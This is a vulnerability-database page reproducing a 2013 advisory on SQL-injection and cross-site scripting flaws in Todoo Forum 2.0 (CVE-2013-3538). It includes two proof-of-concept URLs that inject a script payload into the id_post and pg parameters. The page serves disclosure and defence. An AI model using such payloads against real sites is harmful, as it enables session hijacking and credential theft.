Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2013-3538

Publish Date: 14 Apr 2013

                source: http://www.securityfocus.com/bid/59069/info

Todoo Forum is prone to multiple SQL-injection and cross-site scripting vulnerabilities.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Todoo Forum 2.0 is vulnerable; other versions may also be affected. 

http://www.example.com/todooforum/todooforum.php?cat=reponse&amp;id_forum=0&amp;id_post='"--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;alert(0x0000)&lt;/script&gt;&amp;pg=1
http://www.example.com/todooforum/todooforum.php?cat=reponse&amp;id_forum=0&amp;id_post=2&amp;pg='"--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;alert(0x0000)&lt;/script&gt;

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

Todoo Forum 2.0 - 'todooforum.php' Multiple Cross-Site Scripting Vulnerabilities

Vulmon Search

About

Products

Connect